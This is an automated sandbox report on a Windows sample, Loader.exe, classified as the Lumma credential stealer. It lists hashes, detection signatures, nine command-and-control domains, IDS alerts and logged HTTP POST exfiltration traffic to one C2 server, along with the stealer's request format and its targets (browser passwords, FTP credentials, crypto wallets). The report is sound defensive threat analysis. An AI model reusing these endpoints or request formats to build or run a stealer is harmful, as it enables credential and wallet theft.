
Windows Analysis Report
Loader.exe

Overview

General Information

Sample name: Loader.exe
Analysis ID: 1579012
MD5: 99604ef7ebf56a566a0cdb4b6bb0fa08
SHA1: f16ce4bd1ba5eba29494ff69ac8d263e2f9110b7
SHA256: cca815d086ab89c36262865aaa9e0dd7dc02830aec4e6a3fa8b662b65adf7ce0
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 6448 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 99604EF7EBF56A566A0CDB4B6BB0FA08)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none given)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Extracted malware configuration:
{"C2 url": ["debonairnukk.xyz", "immureprech.biz", "deafeninggeh.biz", "effecterectz.xyz", "ingreem-eilish.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "wrathful-jammy.cyou", "diffuculttan.xyz"], "Build id": "HpOoIh--b58c2f805636"}
Yara matches (Source | Rule | Description | Author | Strings):
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: Loader.exe PID: 6448 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: Loader.exe PID: 6448 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Loader.exe PID: 6448 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-12-20T17:41:44.381468+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49756 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:46.378510+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49761 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:48.661686+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49767 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:50.819969+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49773 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:53.431410+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49780 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:55.900795+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49786 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:57.871064+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49792 | 104.21.90.135 | 443 | TCP
2024-12-20T17:42:00.820993+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49799 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:45.098343+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49756 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:47.097956+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49761 | 104.21.90.135 | 443 | TCP
2024-12-20T17:42:01.648299+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49799 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:45.098343+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49756 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:47.097956+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49761 | 104.21.90.135 | 443 | TCP
2024-12-20T17:41:51.622335+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49773 | 104.21.90.135 | 443 | TCP


              AV Detection

Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["debonairnukk.xyz", "immureprech.biz", "deafeninggeh.biz", "effecterectz.xyz", "ingreem-eilish.biz", "awake-weaves.cyou", "sordid-snaked.cyou", "wrathful-jammy.cyou", "diffuculttan.xyz"], "Build id": "HpOoIh--b58c2f805636"}
Source: Loader.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 80.4% probability
Source: Loader.exe | Joe Sandbox ML: detected
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: sordid-snaked.cyou
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: awake-weaves.cyou
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: wrathful-jammy.cyou
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: debonairnukk.xyz
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: diffuculttan.xyz
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: effecterectz.xyz
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: deafeninggeh.biz
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: immureprech.biz
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: ingreem-eilish.biz
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp | String decryptor: HpOoIh--b58c2f805636
Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_0041729C CryptUnprotectData, 1_2_0041729C
Source: Loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49792 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.90.135:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: Loader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Admin\Workspace\1199853044\Project\Release\Project.pdb source: Loader.exe
Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_011C9255 FindFirstFileExW, 1_2_011C9255

              Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49756 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49756 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49761 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49761 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49799 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49773 -> 104.21.90.135:443
Source: Malware configuration extractor | URLs: debonairnukk.xyz
Source: Malware configuration extractor | URLs: immureprech.biz
Source: Malware configuration extractor | URLs: deafeninggeh.biz
Source: Malware configuration extractor | URLs: effecterectz.xyz
Source: Malware configuration extractor | URLs: ingreem-eilish.biz
Source: Malware configuration extractor | URLs: awake-weaves.cyou
Source: Malware configuration extractor | URLs: sordid-snaked.cyou
Source: Malware configuration extractor | URLs: wrathful-jammy.cyou
Source: Malware configuration extractor | URLs: diffuculttan.xyz
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49756 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49761 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49767 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49780 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49773 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49799 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49792 -> 104.21.90.135:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49786 -> 104.21.90.135:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: ingreem-eilish.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 86 | Host: ingreem-eilish.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=O9SCPS6TVHZ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12800 | Host: ingreem-eilish.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XPBUSMJF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15024 | Host: ingreem-eilish.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3905CUVZJU7SA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20544 | Host: ingreem-eilish.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UB51S031P6CFI | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1230 | Host: ingreem-eilish.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=AL2QEEAZ77KV | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1093 | Host: ingreem-eilish.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 121 | Host: ingreem-eilish.biz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ingreem-eilish.biz
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: ingreem-eilish.biz
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Loader.exe, 00000001.00000003.2614852902.0000000003775000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Loader.exe, 00000001.00000003.2568059409.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568126964.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568255337.00000000036FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Loader.exe, 00000001.00000002.2712486611.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2567538989.000000000145D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2712486611.0000000001457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/
              Source: Loader.exe, 00000001.00000003.2640883555.000000000146F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2641218007.0000000001476000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2640956088.0000000001474000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/&&
              Source: Loader.exe, 00000001.00000002.2712486611.0000000001457000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2690412895.0000000001478000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2640936744.000000000147A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/api
              Source: Loader.exe, 00000001.00000002.2712486611.000000000140C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/apiC
              Source: Loader.exe, 00000001.00000002.2712836874.000000000147C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2690412895.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/apiX
              Source: Loader.exe, 00000001.00000003.2690435332.0000000001475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz/h
              Source: Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz:443/api
              Source: Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz:443/apiK
              Source: Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ingreem-eilish.biz:443/apiicrosoft
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_004327B0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 1_2_004327B0
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_004339F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, | 1_2_004339F0
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_00AFF080 NtAllocateVirtualMemory, | 1_2_00AFF080
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_00AFF5C0 NtProtectVirtualMemory,NtProtectVirtualMemory, | 1_2_00AFF5C0
              Source: C:\Users\user\Desktop\Loader.exe | Code function: String function: 00414160 appears 69 times
              Source: C:\Users\user\Desktop\Loader.exe | Code function: String function: 00407EB0 appears 57 times
              Source: Loader.exe, 00000001.00000000.2328628388.00000000011D9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBedWpostk.exe8 vs Loader.exe
              Source: Loader.exe, 00000001.00000003.2521460358.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBedWpostk.exe8 vs Loader.exe
              Source: Loader.exe | Binary or memory string: OriginalFilenameBedWpostk.exe8 vs Loader.exe
              Source: Loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\Loader.exe | Code function: 1_2_00437BC0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, | 1_2_00437BC0
              Source: Loader.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Loader.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Loader.exe, 00000001.00000003.2589997046.0000000003760000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568570171.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2589781754.00000000036CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2568408318.00000000036E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Loader.exe | ReversingLabs: Detection: 57%
              Source: C:\Users\user\Desktop\Loader.exe | File read: C:\Users\user\Desktop\Loader.exe
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\Loader.exe | Section loaded: ondemandconnroutehelper.dll
              Source: Loader.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: Loader.exe | Static file information: File size 3208704 > 1048576
              Source: Loader.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2df200
              Source: Loader.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: Loader.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: Loader.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: Loader.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Loader.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: Loader.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: Loader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Admin\Workspace\1199853044\Project\Release\Project.pdb source: Loader.exe
              Source: Loader.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: Loader.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: Loader.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: Loader.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: Loader.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
